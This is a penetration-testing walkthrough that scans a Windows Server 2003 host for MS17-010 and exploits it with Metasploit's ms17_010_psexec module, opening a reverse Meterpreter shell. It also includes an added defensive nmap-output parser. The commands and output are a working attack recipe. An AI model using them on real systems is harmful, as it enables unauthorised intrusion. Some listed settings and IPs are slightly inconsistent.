Following the approach of the previous article, this walkthrough tests breaking into a Windows Server 2003 server that is vulnerable to MS17-010.
1. Since there is only one test target, there is no need to scan the whole subnet. Instead, call the NSE scripts directly to check whether the specified IP has any known vulnerabilities.
The scan results below show that 192.168.1.83 is vulnerable to MS17-010. We can then look in Metasploit for a matching module that exploits it.
root@kali:~# nmap --script=vuln 192.168.1.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-11 01:44 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.83
Host is up (0.014s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3000/tcp open  ppp
3389/tcp open  ms-wbt-server
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5432/tcp open  postgresql
|_sslv2-drown:
8086/tcp open  d-s-n
8093/tcp open  unknown
8888/tcp open  sun-answerbook

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 100.88 seconds
root@kali:~#
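As an added defender-side example (not code from the original post), the following Python parser pulls every host-script result whose State is VULNERABLE, together with its CVE ids, out of nmap's normal-format `--script=vuln` output, so a scan of a whole subnet can be turned into a patch list. The sample text is constructed from the ms17-010 result above plus a made-up second host (192.168.1.84) whose check did not complete.

```python
import re

# Constructed sample: the ms17-010 host-script result from the scan above, plus a made-up
# second host (192.168.1.84) whose check did not complete, so the parser has a negative case.
SAMPLE = """\
Nmap scan report for 192.168.1.83
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.1.84
Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|[_ ]([\w-]+):")          # first line of a host-script result
STATE_RE = re.compile(r"^\|\s+State:\s*(.+?)\s*$")   # e.g. "|     State: VULNERABLE"
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_vuln_scan(text):
    """Return [{'host', 'script', 'state', 'cves'}] for each result whose State is VULNERABLE."""
    findings, host, cur = [], None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                        # new host block; forget any open script result
            host, cur = m.group(1), None
            continue
        m = SCRIPT_RE.match(line)
        if m and host:               # script result belonging to the current host
            cur = {"host": host, "script": m.group(1), "state": None, "cves": []}
            continue
        if cur is None or not line.startswith("|"):
            continue                 # not inside a script result (pre-scan section, port table)
        m = STATE_RE.match(line)
        if m:
            cur["state"] = m.group(1)
            if cur["state"] == "VULNERABLE":
                findings.append(cur)
        # collect CVE ids from the IDs and References lines, without duplicates
        cur["cves"] += [c for c in CVE_RE.findall(line) if c not in cur["cves"]]
    return findings
```

Feed it the saved output of a subnet-wide `nmap --script=vuln -oN scan.txt` run to get the list of hosts still needing the MS17-010 patch.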
2. Use Metasploit to try to compromise the target server with the module for the identified vulnerability
2.1 Typing msfconsole in a terminal starts Metasploit on Kali Linux.
root@kali:~# msfconsole
(Metasploit's ASCII-art start-up banner omitted)

       =[ metasploit v4.17.9-dev                          ]
+ -- --=[ 1806 exploits - 1027 auxiliary - 312 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
2.2 The search command followed by a keyword performs a fuzzy search for matching modules.
msf > search ms17_010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf >
2.3 The use command followed by a module name enters that module's context, from which the module can be configured and run for the penetration test.
msf > use windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) >
2.4 The show options command lists every parameter the current module needs in order to run correctly (the Required column shows whether a parameter is mandatory).
msf exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOST                                                                                 yes       The target address
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/smb/ms17_010_psexec) >
2.5 The set command assigns a value to a parameter (and enables it); the unset command clears a parameter again.
msf exploit(windows/smb/ms17_010_psexec) > set DEGTRACE false
DEGTRACE => false
msf exploit(windows/smb/ms17_010_psexec) > set LEAKATTEMPTS 99
LEAKATTEMPTS => 99
msf exploit(windows/smb/ms17_010_psexec) > set NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
NAMED_PIPES => /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.1.83
RHOST => 192.168.1.83
msf exploit(windows/smb/ms17_010_psexec) > set RPORT 445
RPORT => 445
msf exploit(windows/smb/ms17_010_psexec) > set SHARE ADMIN$
SHARE => ADMIN$
msf exploit(windows/smb/ms17_010_psexec) >
2.6 Once every parameter the module requires has been configured, the run command launches the module.
The output below shows that the ms17_010 module has successfully compromised the target server and opened a Meterpreter shell. From there we can run DOS commands directly against the system, for example to check the IP address, create a user, or enable remote access.
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.122.175:4444
[*] 192.168.1.83:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2
[*] 192.168.1.83:445 - Filling barrel with fish... done
[*] 192.168.1.83:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.83:445 -     [*] Preparing dynamite...
[*] 192.168.1.83:445 -     [*] Trying stick 1 (x64)...Boom!
[*] 192.168.1.83:445 -     [+] Successfully Leaked Transaction!
[*] 192.168.1.83:445 -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.83:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.83:445 - Reading from CONNECTION struct at: 0xfffffadf3623e020
[*] 192.168.1.83:445 - Built a write-what-where primitive...
[+] 192.168.1.83:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.83:445 - Selecting native target
[*] 192.168.1.83:445 - Uploading payload... BggYcruU.exe
[*] 192.168.1.83:445 - Created \BggYcruU.exe...
[+] 192.168.1.83:445 - Service started successfully...
[*] 192.168.1.83:445 - Deleting \BggYcruU.exe...
[*] Sending stage (179779 bytes) to 192.168.1.83
[*] Meterpreter session 1 opened (192.168.1.75:4444 -> 192.168.1.83:2335) at 2018-09-11 02:19:07 -0400

meterpreter >
meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:C0:00:08
MTU          : 1500
IPv4 Address : 192.168.1.83
IPv4 Netmask : 255.255.255.0

meterpreter >